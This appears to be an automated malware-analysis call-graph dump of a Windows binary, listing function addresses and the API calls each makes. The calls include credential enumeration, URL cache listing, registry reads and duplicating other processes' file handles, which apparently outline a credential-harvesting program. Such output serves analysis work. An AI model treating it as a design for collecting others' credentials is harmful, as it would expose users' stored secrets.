44553b 38308->38327 38312 403480 38525 40368c 15 API calls 38312->38525 38314 403489 38315 40b633 free 38314->38315 38316 403495 38315->38316 38316->38170 38317 4033a9 memset memcpy 38318 4033ec wcscmp 38317->38318 38319 40333c 38317->38319 38318->38319 38319->38312 38319->38317 38319->38318 38523 4028e7 11 API calls 38319->38523 38524 40f508 6 API calls 38319->38524 38322 403421 _wcsicmp 38322->38319 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38170 38326->38171 38328 445548 38327->38328 38329 445599 38328->38329 38526 40c768 38328->38526 38330 4455a8 memset 38329->38330 38338 4457f2 38329->38338 38609 403988 38330->38609 38336 4455e5 38351 445672 38336->38351 38356 44560f 38336->38356 38341 445854 38338->38341 38711 403e2d memset memset memset memset memset 38338->38711 38339 4458bb memset memset 38343 414c2e 14 API calls 38339->38343 38385 4458aa 38341->38385 38734 403c9c memset memset memset memset memset 38341->38734 38342 44595e memset memset 38346 414c2e 14 API calls 38342->38346 38347 4458f9 38343->38347 38345 445a00 memset memset 38757 414c2e 38345->38757 38354 44599c 38346->38354 38355 40b2cc 27 API calls 38347->38355 38348 44558c 38593 444b06 38348->38593 38349 44557a 38349->38348 38804 4136c0 CoTaskMemFree 38349->38804 38620 403fbe memset memset memset memset memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39137 404363 38556->39137 38559 40bf5d 39157 40440c 38559->39157 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39160 40bd5d 28 API calls 38572->39160 39161 404423 38572->39161 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39174 4135e0 38576->39174 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39177 4449b9 38593->39177 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39198 444972 GetVersionExW 38599->39198 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39202 444a85 42 API calls 38603->39202 38607->38602 38607->38603 39199 444aa5 42 API calls 38607->39199 39200 40a7a0 GetVersionExW 38607->39200 39201 444a85 42 API calls 38607->39201 38610 40399d 38609->38610 39203 403a16 38610->39203 38612 403a09 39217 40b1ab free free 38612->39217 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39214 40a02c CreateFileW 38614->39214 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39244 40414f memset 38634->39244 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39258 40b1ab free free 38637->39258 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39271 40a6e6 WideCharToMultiByte 38643->39271 38645 4087ed 39272 4095d9 memset 38645->39272 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39291 409b98 GetFileAttributesW 38668->39291 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39292 407fdf 75 API calls 38671->39292 39293 409b98 GetFileAttributesW 38672->39293 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39294 4082c7 198 API calls 38676->39294 39295 409b98 GetFileAttributesW 38677->39295 38680 408987 38681 4089a1 38680->38681 38682 40898c 38680->38682 39297 409b98 GetFileAttributesW 38681->39297 39296 408560 29 API calls 38682->39296 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39571 413f27 38700->39571 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39576 413959 38708->39576 39592 413ca4 38708->39592 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39606 40b1ab free free 38728->39606 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39607 40b1ab free free 38750->39607 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39608 409cea 38759->39608 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39611 414bb0 wcscpy 38764->39611 38765->38763 38767 414cd2 39612 4145ac RegQueryValueExW 38767->39612 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39613 409b98 GetFileAttributesW 38833->39613 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39614 40bb98 38836->39614 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39648 409a45 GetTempPathW 38842->39648 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39647 40a6e6 WideCharToMultiByte 38846->39647 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39660 424f26 122 API calls 38863->39660 38864 40b8bd memset 39651 425413 17 API calls 38864->39651 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39661 40a734 MultiByteToWideChar 38880->39661 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39652 4253ef 16 API calls 38885->39652 39653 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39653 39654 4253af 17 API calls 38885->39654 39655 4253cf 17 API calls 38885->39655 39656 447280 memset 38885->39656 39657 447960 memset memcpy memcpy memcpy 38885->39657 39658 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39658 39659 447920 memcpy memcpy memcpy 38885->39659 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39753 409b98 GetFileAttributesW 38898->39753 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39754 409b98 GetFileAttributesW 38906->39754 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39072 40a97a 38946->39072 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39077 40b1ab free free 38951->39077 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39078 40aa1d 38959->39078 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39080 405220 38971->39080 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39071 40b1ab free free 39020->39071 39021->39020 39022 40e540 39022->39017 39070 40e2ab 30 API calls 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39070->39022 39071->39008 39073 40a980 39072->39073 39074 40a995 _wcsicmp 39073->39074 39075 40a99c wcscmp 39073->39075 39076 40a8bb 39073->39076 39074->39073 39075->39073 39076->38949 39076->38950 39077->38953 39079 40aa23 RegEnumValueW 39078->39079 39079->38962 39079->38963 39081 405335 39080->39081 39082 40522a 39080->39082 39081->38547 39083 40b2cc 27 API calls 39082->39083 39084 405234 39083->39084 39085 40a804 8 API calls 39084->39085 39086 40523a 39085->39086 39125 40b273 39086->39125 39088 405248 _mbscpy _mbscat GetProcAddress 39089 40b273 27 API calls 39088->39089 39090 405279 39089->39090 39128 405211 GetProcAddress 39090->39128 39092 405282 39093 40b273 27 API calls 39092->39093 39094 40528f 39093->39094 39129 405211 GetProcAddress 39094->39129 39096 405298 39097 40b273 27 API calls 39096->39097 39098 4052a5 39097->39098 39130 405211 GetProcAddress 39098->39130 39100 4052ae 39101 40b273 27 API calls 39100->39101 39102 4052bb 39101->39102 39131 405211 GetProcAddress 39102->39131 39104 4052c4 39105 40b273 27 API calls 39104->39105 39106 4052d1 39105->39106 39132 405211 GetProcAddress 39106->39132 39108 4052da 39109 40b273 27 API calls 39108->39109 39110 4052e7 39109->39110 39133 405211 GetProcAddress 39110->39133 39112 4052f0 39113 40b273 27 API calls 39112->39113 39114 4052fd 39113->39114 39134 405211 GetProcAddress 39114->39134 39116 405306 39117 40b273 27 API calls 39116->39117 39118 405313 39117->39118 39135 405211 GetProcAddress 39118->39135 39120 40531c 39121 40b273 27 API calls 39120->39121 39122 405329 39121->39122 39136 405211 GetProcAddress 39122->39136 39124 405332 39124->39081 39126 40b58d 27 API calls 39125->39126 39127 40b18c 39126->39127 39127->39088 39128->39092 39129->39096 39130->39100 39131->39104 39132->39108 39133->39112 39134->39116 39135->39120 39136->39124 39138 40440c FreeLibrary 39137->39138 39139 40436d 39138->39139 39140 40a804 8 API calls 39139->39140 39141 404377 39140->39141 39142 404383 39141->39142 39143 404405 39141->39143 39144 40b273 27 API calls 39142->39144 39143->38559 39143->38561 39143->38562 39145 40438d GetProcAddress 39144->39145 39146 40b273 27 API calls 39145->39146 39147 4043a7 GetProcAddress 39146->39147 39148 40b273 27 API calls 39147->39148 39149 4043ba GetProcAddress 39148->39149 39150 40b273 27 API calls 39149->39150 39151 4043ce GetProcAddress 39150->39151 39152 40b273 27 API calls 39151->39152 39153 4043e2 GetProcAddress 39152->39153 39154 4043f1 39153->39154 39155 4043f7 39154->39155 39156 40440c FreeLibrary 39154->39156 39155->39143 39156->39143 39158 404413 FreeLibrary 39157->39158 39159 40441e 39157->39159 39158->39159 39159->38576 39160->38572 39162 40447e 39161->39162 39163 40442e 39161->39163 39162->38572 39164 40b2cc 27 API calls 39163->39164 39165 404438 39164->39165 39166 40a804 8 API calls 39165->39166 39167 40443e 39166->39167 39168 404445 39167->39168 39169 404467 39167->39169 39170 40b273 27 API calls 39168->39170 39169->39162 39172 404475 FreeLibrary 39169->39172 39171 40444f GetProcAddress 39170->39171 39171->39169 39173 404460 39171->39173 39172->39162 39173->39169 39175 4135f6 39174->39175 39176 4135eb FreeLibrary 39174->39176 39175->38579 39176->39175 39178 4449c4 39177->39178 39179 444a52 39177->39179 39180 40b2cc 27 API calls 39178->39180 39179->38596 39179->38597 39181 4449cb 39180->39181 39182 40a804 8 API calls 39181->39182 39183 4449d1 39182->39183 39184 40b273 27 API calls 39183->39184 39185 4449dc GetProcAddress 39184->39185 39186 40b273 27 API calls 39185->39186 39187 4449f3 GetProcAddress 39186->39187 39188 40b273 27 API calls 39187->39188 39189 444a04 GetProcAddress 39188->39189 39190 40b273 27 API calls 39189->39190 39191 444a15 GetProcAddress 39190->39191 39192 40b273 27 API calls 39191->39192 39193 444a26 GetProcAddress 39192->39193 39194 40b273 27 API calls 39193->39194 39195 444a37 GetProcAddress 39194->39195 39196 40b273 27 API calls 39195->39196 39197 444a48 GetProcAddress 39196->39197 39197->39179 39198->38607 39199->38607 39200->38607 39201->38607 39202->38598 39204 403a29 39203->39204 39218 403bed memset memset 39204->39218 39206 403ae7 39231 40b1ab free free 39206->39231 39207 403a3f memset 39211 403a2f 39207->39211 39209 403aef 39209->38614 39210 409d1f 6 API calls 39210->39211 39211->39206 39211->39207 39211->39210 39212 409b98 GetFileAttributesW 39211->39212 39213 40a8d0 7 API calls 39211->39213 39212->39211 39213->39211 39215 40a051 GetFileTime CloseHandle 39214->39215 39216 4039ca CompareFileTime 39214->39216 39215->39216 39216->38614 39217->38615 39219 414c2e 14 API calls 39218->39219 39220 403c38 39219->39220 39221 409719 2 API calls 39220->39221 39222 403c3f wcscat 39221->39222 39223 414c2e 14 API calls 39222->39223 39224 403c61 39223->39224 39225 409719 2 API calls 39224->39225 39226 403c68 wcscat 39225->39226 39232 403af5 39226->39232 39229 403af5 20 API calls 39230 403c95 39229->39230 39230->39211 39231->39209 39233 403b02 39232->39233 39234 40ae18 9 API calls 39233->39234 39243 403b37 39234->39243 39235 403bdb 39237 40aebe FindClose 39235->39237 39236 40add4 wcscmp wcscmp 39236->39243 39238 403be6 39237->39238 39238->39229 39239 40a8d0 7 API calls 39239->39243 39240 40ae18 9 API calls 39240->39243 39241 40ae51 9 API calls 39241->39243 39242 40aebe FindClose 39242->39243 39243->39235 39243->39236 39243->39239 39243->39240 39243->39241 39243->39242 39245 409d1f 6 API calls 39244->39245 39246 404190 39245->39246 39259 409b98 GetFileAttributesW 39246->39259 39248 40419c 39249 4041a7 6 API calls 39248->39249 39250 40435c 39248->39250 39251 40424f 39249->39251 39250->38636 39251->39250 39253 40425e memset 39251->39253 39255 409d1f 6 API calls 39251->39255 39256 40a8ab 9 API calls 39251->39256 39260 414842 39251->39260 39253->39251 39254 404296 wcscpy 39253->39254 39254->39251 39255->39251 39257 4042b6 memset memset _snwprintf wcscpy 39256->39257 39257->39251 39258->38640 